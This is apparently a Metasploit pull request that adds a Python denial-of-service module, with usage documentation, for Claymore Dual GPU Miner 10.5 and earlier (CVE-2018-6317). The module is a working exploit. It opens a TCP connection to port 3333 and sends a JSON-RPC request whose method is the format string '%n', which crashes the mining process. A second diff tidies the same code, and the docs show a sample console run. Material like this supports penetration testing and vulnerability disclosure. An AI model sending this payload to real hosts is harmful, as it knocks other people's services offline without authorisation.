### PR TITLE
Claymore Dual GPU Miner<= 10.5 dos 

### DIFF
--- a/documentation/modules/auxiliary/dos/tcp/claymore.md
+++ b/documentation/modules/auxiliary/dos/tcp/claymore.md
@@ -1,0 +1,38 @@
+## Vulnerable Application
+
+Vulnerable application versions include:
+Claymore Dual GPU Miner<=10.5
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use auxiliary/dos/tcp/claymore_doc`
+3. Do: `set rhost`
+4. Do: `run`
+5. check your miner.
+
+## Scenarios
+
+### Claymore Dual GPU Miner/10.0 - window7
+
+```
+msf5 > use auxiliary/dos/tcp/claymore_dos
+msf5 auxiliary(dos/tcp/claymore_dos) > show options
+
+Module options (auxiliary/dos/tcp/claymore_dos):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   rhost                   yes       The target address
+   rport  3333             yes       The target port
+
+msf5 auxiliary(dos/tcp/claymore_dos) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf5 auxiliary(dos/tcp/claymore_dos) > run
+
+[*] Starting server...
+[*] Creating sockets...
+[*] Auxiliary module execution completed
+```
+
+

--- a/modules/auxiliary/dos/tcp/claymore_dos.py
+++ b/modules/auxiliary/dos/tcp/claymore_dos.py
@@ -1,0 +1,55 @@
+#!/usr/bin/env python
+# Note, works with both python 2.7 and 3
+
+
+import socket
+import json
+
+from metasploit import module
+
+metadata = {
+    'name': 'Claymore Dual GPU Miner  Format String dos attack',
+
+    'description': '''
+    Claymore’s Dual GPU Miner 10.5 and below is vulnerable to a format strings vulnerability. This allows an 
+    unauthenticated attacker to read memory addresses, or immediately terminate the mining process causing 
+    a denial of service.
+    ''',
+
+    'authors': [
+        'res1n',  # Vulnerability disclosure
+        'bluebird',  # Metasploit external module (Python)
+    ],
+
+    'date': '2018-02-06',
+
+    'references': [
+        {'type': 'cve', 'ref': 'CVE-2018-6317'},
+        {'type': 'url', 'ref': 'https://www.exploit-db.com/exploits/43972/'},
+        {'type': 'url', 'ref': 'https://github.com/nanopool/Claymore-Dual-Miner'}
+    ],
+
+    'type': 'dos',
+    'options': {
+        'rhost': {'type': 'address', 'description': 'The target address', 'required': True, 'default': None},
+        'rport': {'type': 'port', 'description': 'The target port', 'required': True, 'default': 3333},
+    }}
+
+
+def run(args):
+    host = args['rhost']
+    port = int(args['rport'])
+    module.log("Creating sockets...", 'info')
+
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    exp = '''{"id": 1,"jsonrpc": "1.0","method": "%n"}'''
+    try:
+        s.connect((host, port))
+        s.send(bytes(exp,'utf-8'))
+        s.close()
+    except socket.error:
+        module.log("connect error exit")
+
+
+if __name__ == "__main__":
+    module.run(metadata, run)

--- a/modules/auxiliary/dos/tcp/claymore_dos.py
+++ b/modules/auxiliary/dos/tcp/claymore_dos.py
@@ -41,11 +41,10 @@ def run(args):
     port = int(args['rport'])
     module.log("Creating sockets...", 'info')
 
-    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-    exp = '''{"id": 1,"jsonrpc": "1.0","method": "%n"}'''
+    exp = json.dumps({'id': 1, 'jsonrpc': '1.0', 'method': '%n'}).encode()
     try:
-        s.connect((host, port))
-        s.send(bytes(exp,'utf-8'))
+        s = socket.create_connection((host, port), 10)
+        s.send(exp)
         s.close()
     except socket.error:
         module.log("connect error exit")


### PR DESCRIPTION
This PR adds a module for  Claymore Dual GPU Miner<= 10.5 dos 

## Verification
- [x]  install and run Claymore Dual GPU Miner
- [x] Start `msfconsole`
- [x] `use auxiliary/dos/tcp/claymore_dos`
- [x]  `set rhost <rhost>`
- [x]  `run`
- [x]  Verify Miner program

